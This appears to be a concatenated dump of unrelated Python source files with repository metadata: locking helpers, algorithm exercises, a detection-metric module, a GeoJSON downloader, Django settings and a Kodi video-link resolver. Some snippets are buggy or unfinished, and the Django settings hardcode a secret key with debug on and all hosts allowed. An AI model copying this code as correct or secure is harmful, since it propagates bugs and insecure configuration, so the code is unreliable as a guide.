setattr(obj, attribute_name, Container())
container = getattr(obj, attribute_name)
return container
def item_reference_container(reference):
obj = reference.object
item = reference.index
container_dict_name = "__item_info__"
if not hasattr(obj, container_dict_name):
with item_info_lock(obj):
if not hasattr(obj, container_dict_name):
setattr(obj, container_dict_name, {})
container_dict = getattr(obj, container_dict_name)
if item not in container_dict:
with item_info_lock(obj):
if item not in container_dict:
# logging.debug(f"{obj}.{container_dict_name}.[{item}] = {Container()}")
container_dict[item] = Container()
container = container_dict[item]
return container
def attribute_info_lock(obj):
return object_lock(obj, "attribute_info")
def item_info_lock(obj):
return object_lock(obj, "item_info")
def object_lock(obj, name):
attribute_name = f"__{name}_lock__"
if not hasattr(obj, attribute_name):
with global_lock:
if not hasattr(obj, attribute_name):
lock = Lock()
# logging.debug(f"{reference}.{attribute_name} = {lock}")
setattr(obj, attribute_name, lock)
lock = getattr(obj, attribute_name)
return lock
global_lock = Lock()
class Container:
def __init__(self):
self.lock = Lock()
def __repr__(self):
return f"{self.class_name}()"
@property
def class_name(self):
return type(self).__name__
if __name__ == '__main__':
msg_format = "%(asctime)s %(levelname)s %(module)s.%(funcName)s, line %(lineno)d: %(message)s"
logging.basicConfig(level=logging.DEBUG, format=msg_format)
from timing_system_client import timing_system_client
from reference import reference as _reference
domain_name = "BioCARS"
timing_system = timing_system_client(domain_name)
reference = _reference(timing_system.channels.xdet.trig_count, "count")
self = attribute_or_item_reference_container(reference)
| [
"friedrich.schotte@gmail.com"
] | friedrich.schotte@gmail.com |
1bda04dee8ec7d57057dc9c1002af3262d36d79f | 26552adb0d8889affd40e009d3c311e41a873e43 | /Python_Solutions/16003.py | 1d232c99deebfd3a3fb463781eb54a524dcccaef | [] | no_license | Isaac-Lee/BOJ-Algorithm | 3b9b64aba9ab3b48d15133cbf5ad122822e441d0 | 27f0339195c48f416e672390758e85305203b71a | refs/heads/main | 2022-06-29T21:36:11.500158 | 2022-06-25T06:35:05 | 2022-06-25T06:35:05 | 203,349,860 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | nm = [int(k) for k in input().split()]
nList = [[] for i in range(nm[0])]
re=[]
mNum ={}
for i in range(nm[1]):
m = [int(m) for m in input().split()]
nList[m[0]-1].append(m[1]-1)
nList[m[1]-1].append(m[0]-1)
print(nList)
for j in range(nm[0]):
mNum[j] = len(nList[j])
print(mNum)
for k in range(nm[1]):
mini = list(mNum.values()).index(min(mNum.values()))
re.append(mini)
print(mini)
for index in range(nm[0]):
print(index)
if index != mini:
print(nList[index])
nList[index].remove(mini)
mNum[index] -= 1
# print(nList)
# print(mNum)
# print(re)
'''미해결'''
'''
nList[index].remove(mini)에서 에러
''' | [
"yy0221ss@gmail.com"
] | yy0221ss@gmail.com |
f4efbd707a0ea513abca53dd28189b88cc398eeb | a5bffa3c32a4955648345a201c3be4fe0a324136 | /utils/box/metric.py | 1cade1c54a41deec5844621516e8934dad9ba6ed | [
"MIT"
] | permissive | ming71/SLA | 178282e0ae1ecba8512f4b4b69f0d721a3c590b4 | 7024b093bc0d456b274314ebeae3bc500c2db65a | refs/heads/master | 2023-08-02T06:10:50.893229 | 2021-09-24T02:11:50 | 2021-09-24T02:11:50 | 370,882,400 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,602 | py | import numpy as np
from collections import defaultdict, Counter
from .rbbox_np import rbbox_iou
def get_ap(recall, precision):
recall = [0] + list(recall) + [1]
precision = [0] + list(precision) + [0]
for i in range(len(precision) - 1, 0, -1):
precision[i - 1] = max(precision[i - 1], precision[i])
ap = sum((recall[i] - recall[i - 1]) * precision[i] for i in range(1, len(recall)) if recall[i] != recall[i - 1])
return ap * 100
def get_ap_07(recall, precision):
ap = 0.
for t in np.linspace(0, 1, 11, endpoint=True):
mask = recall >= t
if np.any(mask):
ap += np.max(precision[mask]) / 11
return ap * 100
def get_det_aps(detect, target, num_classes, iou_thresh=0.5, use_07_metric=False):
# [[index, bbox, score, label], ...]
aps = []
for c in range(num_classes):
target_c = list(filter(lambda x: x[3] == c, target))
detect_c = filter(lambda x: x[3] == c, detect)
detect_c = sorted(detect_c, key=lambda x: x[2], reverse=True)
tp = np.zeros(len(detect_c))
fp = np.zeros(len(detect_c))
target_count = Counter([x[0] for x in target_c])
target_count = {index: np.zeros(count) for index, count in target_count.items()}
target_lut = defaultdict(list)
for index, bbox, conf, label in target_c:
target_lut[index].append(bbox)
detect_lut = defaultdict(list)
for index, bbox, conf, label in detect_c:
detect_lut[index].append(bbox)
iou_lut = dict()
for index, bboxes in detect_lut.items():
if index in target_lut:
iou_lut[index] = rbbox_iou(np.stack(bboxes), np.stack(target_lut[index]))
counter = defaultdict(int)
for i, (index, bbox, conf, label) in enumerate(detect_c):
count = counter[index]
counter[index] += 1
iou_max = -np.inf
hit_j = 0
if index in iou_lut:
for j, iou in enumerate(iou_lut[index][count]):
if iou > iou_max:
iou_max = iou
hit_j = j
if iou_max > iou_thresh and target_count[index][hit_j] == 0:
tp[i] = 1
target_count[index][hit_j] = 1
else:
fp[i] = 1
tp_sum = np.cumsum(tp)
fp_sum = np.cumsum(fp)
npos = len(target_c)
recall = tp_sum / npos
precision = tp_sum / (tp_sum + fp_sum)
aps.append((get_ap_07 if use_07_metric else get_ap)(recall, precision))
return aps
| [
"mq_chaser@126.com"
] | mq_chaser@126.com |
ef1bd6c833f07200173ede8a31562c463ffe5137 | f999bc5a6e0da4f0904ef2112d7b6191f180ca5b | /Practice/1/no_of_paths_mx.py | 0d9e16140066176ae5144fd71ec615bfba130cee | [] | no_license | ritesh-deshmukh/Algorithms-and-Data-Structures | 721485fbe91a5bdb4d7f99042077e3f813d177cf | 2d3a9842824305b1c64b727abd7c354d221b7cda | refs/heads/master | 2022-11-09T00:18:51.203415 | 2018-10-08T22:31:05 | 2018-10-08T22:31:05 | 132,504,988 | 0 | 1 | null | 2022-10-23T00:51:15 | 2018-05-07T19:07:33 | Python | UTF-8 | Python | false | false | 539 | py | def test(m,n):
arr = [[0 for _ in range(m)] for _ in range(n)]
for i in range(m):
arr[i][0] = 1
for j in range(n):
arr[0][j] = 1
for i in range(1, m):
for j in range(n):
arr[i][j] = arr[i-1][j] + arr[i][j-1]
print(arr)
return arr[m-1][n-1]
# print(arr, end=" ")
m = 3
n = 3
print(test(m,n))
# def no_of_paths(m, n):
# if m == 1 or n == 1:
# return 1
#
# return no_of_paths(m-1, n) + no_of_paths(m, n-1)
#
#
# m = 3
# n = 3
#
# print(no_of_paths(m,n))
| [
"riteshdeshmukh260@gmail.com"
] | riteshdeshmukh260@gmail.com |
e4f11f4ce8171c561aea33859a1304ce7d33d527 | 4577d8169613b1620d70e3c2f50b6f36e6c46993 | /students/1719708/homework03/program01.py | 1d48e0a1c60c036592ba3307723907bbfdace1cb | [] | no_license | Fondamenti18/fondamenti-di-programmazione | cbaf31810a17b5bd2afaa430c4bf85d05b597bf0 | 031ec9761acb1a425fcc4a18b07884b45154516b | refs/heads/master | 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,464 | py | from immagini import *
def quadrato(filename,c):
lato = [-1]
vertice = [0, 0]
img = load(filename)
for row in range(len(img)):
for col in range(len(img[0])):
if img[row][col] == c:
v = [row, col]
cerca_quadrati(img, lato, vertice, v, c)
return (lato[0], (vertice[1], vertice[0]))
def cerca_quadrati(image, lato, vertice, v, c):
value = True
l = lato[0] + 1
while v[0] + l < len(image) and v[1] + l < len(image[0]) and value:
value, l = controlli(image, l, v, c, value)
if not value and lato[0] < l - 1:
lato[0] = l
vertice[:] = v[:]
def controlli(image, l, v, c, value):
if primari(image, l, v, c):
value = False
elif secondari(image, l, v, c):
value = False
else:
l += 1
return value, l
def primari(image, l, v, c):
value = False
if not vertici(image, l, v, c):
value = True
elif not diagonale1(image, l, v, c):
value = True
elif not diagonale2(image, l, v, c):
value = True
return value
def secondari(image, l, v, c):
value = False
if l != 0 and not frame(image, l, v, c):
value = True
elif l != 0 and not full(image, l, v, c):
value = True
return value
def vertici(image, l, v, c):
return image[v[0]][v[1] + l] == c and image[v[0] + l][v[1]] == c and image[v[0] + l][v[1] + l] == c
def diagonale1(image, l, v, c):
d = 0
while d < l and image[v[0] + d][v[1] + d] == c:
d += 1
return image[v[0] + d][v[1] + d] == c
def diagonale2(image, l, v, c):
d = 0
while d < l and image[v[0] + d][v[1] + l - d] == c:
d += 1
return image[v[0] + d][v[1] + l - d] == c
def full(image, l, v, color):
r = v[0] + 1
c = v[1] + 1
l = l - 1
while r < v[0] + l and image[r][c] == color:
while c < v[1] + l and image[r][c] == color:
c += 1
if image[r][c] == color:
r += 1
c = v[1]
return image[r][c] == color
def frame(image, l, v, color):
r = v[0]
c = v[1]
value1 = altezze(image, r, c, l, color)
if value1:
i = 0
value2 = paralleli(image, r, c, l, color)
return value1 and value2
def altezze(image, r, c, l, color):
i = 0
while i < l and image[r + i][c + l] == color and image[r + i][c] == color:
i += 1
return image[r + i][c + l] == color and image[r + i][c] == color
def paralleli(image, r, c, l, color):
i = 0
while i < l and image[r + l][c + i] == color and image[r][c + i] == color:
i += 1
return image[r + l][c + i] == color and image[r][c + i] == color | [
"a.sterbini@gmail.com"
] | a.sterbini@gmail.com |
f4b6fb07afe16236f8d8856add56e78b27adbdd7 | b1adf2e06de52417119c1b6a150739533e9634a9 | /tools/geojson_simplifier/download.py | 67817408fefc638890c34429b23d360d37cbd78d | [
"Apache-2.0"
] | permissive | tjann/website | 5fadc61c86418d7beed7efe25e55ba2e8320cab4 | 0a4d41f157632324437305ba66b4f0ee8e54df00 | refs/heads/master | 2023-04-01T23:21:24.396459 | 2020-11-25T22:27:27 | 2020-11-25T22:27:27 | 301,866,316 | 0 | 0 | Apache-2.0 | 2020-10-06T22:09:37 | 2020-10-06T22:09:36 | null | UTF-8 | Python | false | false | 4,657 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Downloads and saves GeoJson map files from DataCommons.
Typical usage:
python3 download.py
"""
import datacommons as dc
import geojson
# TODO(fpernice-google): Support downloading more than just US states.
class GeojsonDownloader:
"""Downloads desired GeoJSON files from the DataCommons Knowledge Graph.
Attributes:
geojsons: A dictionary that maps each queried area to another
dictionary containing the GeoJSON coordinate information. An
example of this is the following
{ # Multipolygon of the state of Alabama (fake).
"geoId/01": [{
"type": "MultiPolygon",
# Set of individual Polygons that compose it.
"coordinates": [
# Polygon 1
[[ [1.5, 12.4], [5.3, 45.2], [1.1, 3.5],
[1.5, 12.4] ]],
# Polygon 2
[[ [1, 2], [3, 4], [5, 6], [2, -1], [1, 2] ]],
# Polygon 3
[[ [53, 23], [65, 2], [31, 12], [53, 23] ]]
]
}],
# Polygon of the state of Wyoming (fake).
# Since Wyoming is a single chunk of land, its type
# is Polygon instead of Multipolygon.
"geoId/17": [{
"type": "Polygon",
"coordinates": [
# Polygon 1
[[ [1.5, 12.4], [5.3, 45.2], [1.1, 3.5],
[1.5, 12.4] ]]
]
}]
}
"""
LEVEL_MAP = {
"Country": "AdministrativeArea1",
"AdministrativeArea1": "AdministrativeArea2",
"AdministrativeArea2": "City"
}
def __init__(self):
dc.set_api_key('dev')
self.geojsons = None
def download_data(self, place='country/USA'):
"""Downloads GeoJSON data for a specified location.
Given the specified location, extracts the GeoJSONs of all
administrative areas one level below it (as specified by the
LEVEL_MAP class constant). For example, if the input is country/USA,
extracts all AdministrativeArea1's within the US (US states).
Args:
place: A string that is a valid value for the geoId property of a
DataCommons node.
Raises:
ValueError: If a Data Commons API call fails.
"""
geolevel = dc.get_property_values([place], "typeOf")
# There is an extra level of nesting in geojson files, so we have
# to get the 0th element explicitly.
assert len(geolevel[place]) == 1
geolevel = geolevel[place][0]
geos_contained_in_place = dc.get_places_in(
[place], self.LEVEL_MAP[geolevel])[place]
self.geojsons = dc.get_property_values(geos_contained_in_place,
"geoJsonCoordinates")
def save(self, prefix='', path='./original-data/'):
"""Saves the downloaded geojsons to disk.
Args:
prefix: Prefix prepended to the geoId of a given GeoJSON to
determine the name of its filename. For example, if
prefix='original-', a resulting filename might be
'original-geoId-01.geojson'.
path: Directory in which to save the desired files, as a string.
"""
for geoid in self.geojsons:
assert len(self.geojsons[geoid]) == 1
coords = self.geojsons[geoid][0]
filename = geoid.replace('/', '-')
with open(path + prefix + filename + '.geojson', 'w') as f:
geojson.dump(geojson.loads(coords), f)
if __name__ == '__main__':
loader = GeojsonDownloader()
loader.download_data()
loader.save()
| [
"noreply@github.com"
] | tjann.noreply@github.com |
54c12ac707d0fb9f3034bafa6706d3b24fb2c777 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_inaugurates.py | 7de12e81b92bba657d8dbf9875af9f14f3716b76 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
#calss header
class _INAUGURATES():
def __init__(self,):
self.name = "INAUGURATES"
self.definitions = inaugurate
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['inaugurate']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8fd79fcb1629b053b15ec3b50f90f913cea4dd13 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/poroussel/pancakes | 5c6939bca7de41d39bd719fa3b49cb1a7017af13 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 548 | #!/usr/bin/env python
import fileinput
def resolve(pancakes):
while pancakes[-1] == '+':
pancakes.pop()
if not len(pancakes):
return 0
num = 1
last = pancakes[0]
for p in pancakes[1:]:
if p != last:
num += 1
last = p
return num
if __name__ == "__main__":
input = fileinput.input()
nbtst = int(input.readline())
for idx in range(nbtst):
pancakes = list(input.readline().strip('\n'))
print 'Case #{}: {}'.format(idx+1, resolve(pancakes))
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] | |
ee0b0649a0153943aa926fb5b3951b59399eba96 | 3e8352f1523f5cc1982a41a9e2f655ebda7e58ad | /test/hummingbot/client/command/test_balance_command.py | 1d85c6a462be9e1fbec811d3bdae6a533f44ee33 | [
"Apache-2.0"
] | permissive | matthewbackhouse/hummingbot | a159bfa7d94c3b2c9b3549e4bc304253c4a42791 | 9023822744202624fad276b326cc999b72048d67 | refs/heads/master | 2023-09-03T03:03:18.354741 | 2021-11-02T05:16:59 | 2021-11-02T05:16:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,789 | py | import asyncio
import unittest
from copy import deepcopy
from typing import Awaitable
from unittest.mock import patch, MagicMock
from hummingbot.client.config.global_config_map import global_config_map
from hummingbot.client.hummingbot_application import HummingbotApplication
from test.mock.mock_cli import CLIMockingAssistant
class BalanceCommandTest(unittest.TestCase):
@patch("hummingbot.core.utils.trading_pair_fetcher.TradingPairFetcher")
def setUp(self, _: MagicMock) -> None:
super().setUp()
self.ev_loop = asyncio.get_event_loop()
self.app = HummingbotApplication()
self.cli_mock_assistant = CLIMockingAssistant(self.app.app)
self.cli_mock_assistant.start()
self.global_config_backup = deepcopy(global_config_map)
def tearDown(self) -> None:
self.cli_mock_assistant.stop()
self.reset_global_config()
super().tearDown()
def reset_global_config(self):
for key, value in self.global_config_backup.items():
global_config_map[key] = value
@staticmethod
def get_async_sleep_fn(delay: float):
async def async_sleep(*_, **__):
await asyncio.sleep(delay)
return async_sleep
def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
ret = self.ev_loop.run_until_complete(asyncio.wait_for(coroutine, timeout))
return ret
def async_run_with_timeout_coroutine_must_raise_timeout(self, coroutine: Awaitable, timeout: float = 1):
class DesiredError(Exception):
pass
async def run_coro_that_raises(coro: Awaitable):
try:
await coro
except asyncio.TimeoutError:
raise DesiredError
try:
self.async_run_with_timeout(run_coro_that_raises(coroutine), timeout)
except DesiredError: # the coroutine raised an asyncio.TimeoutError as expected
raise asyncio.TimeoutError
except asyncio.TimeoutError: # the coroutine did not finish on time
raise RuntimeError
@patch("hummingbot.user.user_balances.UserBalances.all_balances_all_exchanges")
def test_show_balances_handles_network_timeouts(
self, all_balances_all_exchanges_mock
):
all_balances_all_exchanges_mock.side_effect = self.get_async_sleep_fn(delay=0.02)
global_config_map["other_commands_timeout"].value = 0.01
with self.assertRaises(asyncio.TimeoutError):
self.async_run_with_timeout_coroutine_must_raise_timeout(self.app.show_balances())
self.assertTrue(
self.cli_mock_assistant.check_log_called_with(
msg="\nA network error prevented the balances to update. See logs for more details."
)
)
| [
"petioptrv@icloud.com"
] | petioptrv@icloud.com |
fa1d8f93970ac77ce82fb5918674f2d1f937b0d5 | 2a3606551a4d850a7b4d6a4e08089c51108ef7be | /script.mrknow.urlresolver/lib/urlresolver9/plugins/vidmad.py | ed863f4b84cd7ed1da2688e61c60efbc0f68e9f3 | [
"GPL-2.0-only",
"Apache-2.0"
] | permissive | rrosajp/filmkodi | a6bb1823f4ed45453c8b8e54ffbd6a7b49f44450 | 0162cde9ae25ddbf4a69330948714833ff2f78c9 | refs/heads/master | 2021-09-18T06:03:17.561062 | 2018-06-22T23:28:53 | 2018-06-22T23:28:53 | 234,768,781 | 1 | 0 | Apache-2.0 | 2021-06-03T20:33:07 | 2020-01-18T17:11:57 | null | UTF-8 | Python | false | false | 1,745 | py | '''
urlresolver Kodi plugin
Copyright (C) 2016 Gujal
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from lib import helpers
from urlresolver9 import common
from urlresolver9.resolver import UrlResolver, ResolverError
class VidMadResolver(UrlResolver):
name = "vidmad.net"
domains = ["vidmad.net", "tamildrive.com"]
pattern = '(?://|\.)((?:vidmad|tamildrive)\.(?:net|com))/(?:embed-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.FF_USER_AGENT}
response = self.net.http_GET(web_url, headers=headers)
html = response.content
if 'Not Found' in html:
raise ResolverError('File Removed')
if 'Video is processing' in html:
raise ResolverError('File still being processed')
sources = helpers.scrape_sources(html)
return helpers.pick_source(sources) + helpers.append_headers(headers)
def get_url(self, host, media_id):
return self._default_get_url(host, media_id)
| [
"mrknow@interia.pl"
] | mrknow@interia.pl |
bf878dc50992ff87dfe63509c1edb33f2a81f5d9 | c92f8b2870add6860ef6b98a9e702788af5fd967 | /Chapter04/generatorex.py | 17a3e95792dfd007db20bac86a4a23afdaa11417 | [] | no_license | Rabidza/INF1511 | c6e1244679b2eff3f782957c056a72d49a552176 | 4bc10130a3693f3223bd12f4e9212a037bd1fc2a | refs/heads/master | 2021-09-08T05:42:58.897999 | 2018-03-07T20:08:31 | 2018-03-07T20:08:31 | 116,714,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | def fruits(seq):
for fruit in seq:
yield '%s' % fruit
f = fruits(["Apple", "Orange", "Mango", "Banana"])
print("The list of fruits is:")
print(f.__next__())
print(f.__next__())
print(f.__next__())
print(f.__next__())
f = fruits(["Apple", "Orange", "Mango", "Banana"])
print("The list of fruits is:")
for x in f:
print(x)
| [
"neillhenning@gmail.com"
] | neillhenning@gmail.com |
ef21d236fe9887c6a043c2e2b8b071947d54c588 | 7ec92031e28b1a92a10a9f252f99211663e0d8f9 | /src/py/l0893.py | 7f22bf16ff81b31efaa612c67eff54c34c57752b | [] | no_license | SS4G/leetcode_2020 | 4eb63f6afd59f84e44334e78cb06c7b33a89dd15 | 9a9a8fc779e7456db77f88e7dcdcc1f5cae92c62 | refs/heads/master | 2020-06-29T17:12:39.488350 | 2020-02-08T01:07:08 | 2020-02-08T01:07:08 | 200,575,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | from collections import defaultdict
class SpecialEqual:
def __init__(self, str0):
self.oddCharSet = defaultdict(lambda :0)
self.evenCharSet = defaultdict(lambda :0)
for idx, c in enumerate(str0):
if idx & 1 == 1:
self.oddCharSet[c] += 1
else:
self.evenCharSet[c] += 1
#self.hashKey = self.getHashKey()
def getHashKey(self):
oddTuple = list(self.oddCharSet.items())
oddTuple.sort()
evenTuple = list(self.evenCharSet.items())
evenTuple.sort()
return (evenTuple, oddTuple)
#return s
class Solution(object):
def numSpecialEquivGroups(self, A):
"""
:type A: List[str]
:rtype: int
"""
keyDict = defaultdict(lambda :0)
for str0 in A:
se = SpecialEqual(str0)
keyDict[se.hashKey] += 1
return len(keyDict.keys())
if __name__ == "__main__":
pass
| [
"zihengs@opera.com"
] | zihengs@opera.com |
269a9583ed02424a432d30fb8e2324113b3155e9 | b948da1493329127a9a9ab567bae874c8cfa0bf4 | /portfolio/settings.py | d14137d7fde4fba7b1ae45b948c24066d3adef5c | [] | no_license | Kotodian/portfolio | edb93bec72d66d1fececd71b67a8e7f92cebb260 | 5661bf5d8134bbb576b2ea771fe5a6210c942feb | refs/heads/master | 2020-06-13T02:32:59.356331 | 2019-07-04T08:22:28 | 2019-07-04T08:24:22 | 194,503,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | """
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 's@281miy&cizve+fkz*ppmfm2$$qtk_2&*jqv@fr082ng=v!w('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#我的App
'gallery.apps.GalleryConfig',
'blog.apps.BlogConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATICFILES_DIRS=[
os.path.join(BASE_DIR,'static')
]
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
| [
"root@vultr.guest"
] | root@vultr.guest |
092b4f51337ff6d474d15c92a99205d86476b0e0 | 63b997a325ccd3a0d50eed68acb260dba0d9ddbc | /solution 1.py | 848ce35f44cfeef22118bb38b46ae345a1120b3f | [] | no_license | GLAU-TND/python-programming-assignment-2-anshika123456 | 238c8f78f09192f731b395313acecdc70bad3b11 | 2892ed91b5e0cab7d00cf349129b5746cb6eaf03 | refs/heads/master | 2021-01-13T22:45:16.969806 | 2020-02-23T17:38:17 | 2020-02-23T17:38:17 | 242,518,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | n=eval(input())
a=[]
p=n[0][-1]
a.append(n[0])
n=n[1:]
for j in n:
for i in n:
if p==i[0] and i not in a:
a.append(i)
p=i[-1]
print(a)
| [
"noreply@github.com"
] | GLAU-TND.noreply@github.com |
fa525dc7c9ab05eb28f373dd7d92e1e7c26dc407 | 0f5f6ff75cef3e81419216ba0191bb69a26c9068 | /hackerank/stat/wmean.py | 4fba60a0e2fa733e6d25f1ea4c30d0b972482be5 | [] | no_license | daddyawesome/CodingP | 1c7bbb2edd30333f7cb1b78ec6a0428854c4fa2b | 66ab4e452c23f3f770d6ad1e32f604c65e1dcbd3 | refs/heads/master | 2022-10-13T18:36:23.068195 | 2022-10-04T07:01:58 | 2022-10-04T07:01:58 | 220,047,911 | 0 | 0 | null | 2020-07-07T20:49:07 | 2019-11-06T17:01:44 | Python | UTF-8 | Python | false | false | 390 | py | '''
Weighted Mean
'''
n = input()
elements = input()
weights = input()
elements = elements.split(' ')
weights = weights.split(' ')
numerator = 0
denominator = 0
for i in range(0, len(elements)):
numerator = numerator + int(weights[i]) * int(elements[i])
denominator = denominator + int(weights[i])
weighted_mean = numerator / float(denominator)
print(round(weighted_mean, 1))
| [
"sablay296@gmail.com"
] | sablay296@gmail.com |
a501a6377f6fd1a8cf8077ad539dbf88ce6b8c96 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03626/s769192318.py | 659f9e7bc552bd622370f1ebcadc9cd3dcf92378 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | mod = 1000000007
n = int(input())
s1 = input()
s2 = input()
ans = 1
for i in range(n):
if s1[i] == s2[i]:
if i==0:
ans *= 3
else:
if s1[i-1]==s2[i-1]:
ans *= 2
else:
continue
else:
if i==0:
ans *= 6
else:
if s1[i] == s1[i-1]:
continue
elif s1[i-1] == s2[i-1]:
ans *=2
else:
ans *= 3
ans = ans%mod
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
54ef31def53b0ce31a1fa0cf49cb09a862d4173e | bf460178162ada0dff219808ebcb6909d2118c0b | /0x11-python-network_1/8-json_api.py | f14ad6ccaabd85d773455006210295e0a3cced71 | [] | no_license | dario-castano/holbertonschool-higher_level_programming | b273d53da01eaa13aafcfef49a84cf4504e15795 | b509695dc898bf31dfb8cc4f82c4bdfdb8407cae | refs/heads/master | 2023-08-10T17:15:27.232508 | 2020-02-13T14:42:17 | 2020-02-13T14:42:17 | 207,344,442 | 0 | 0 | null | 2023-07-22T15:46:03 | 2019-09-09T15:39:58 | Python | UTF-8 | Python | false | false | 585 | py | #!/usr/bin/python3
"""
Python script that takes in a URL, sends a request to the URL
and displays the body of the response.
"""
import sys
import requests
if __name__ == "__main__":
data = {"q": sys.argv[1] if sys.argv.__len__() >= 2 else ""}
url = 'http://0.0.0.0:5000/search_user'
response = requests.post(url, data)
try:
json_data = response.json()
if not json_data:
print('No result')
else:
print('[{}] {}'.format(json_data.get('id'), json_data.get('name')))
except ValueError:
print('Not a valid JSON')
| [
"dario.castano@aim.com"
] | dario.castano@aim.com |
fdfd1fdd521757e153615bc1f421caef78c1123e | 0fd66a4a28bdc7d967ec18d90eca5cc54b5cbdd4 | /middleware/legato/templates/legato_gfx_mxt_cpro/legato_gfx_mxt_cpro.py | b8df421ed62d583c03dbef0bf18cd7bf19b1b356 | [
"LicenseRef-scancode-unknown-license-reference",
"ISC",
"LicenseRef-scancode-public-domain"
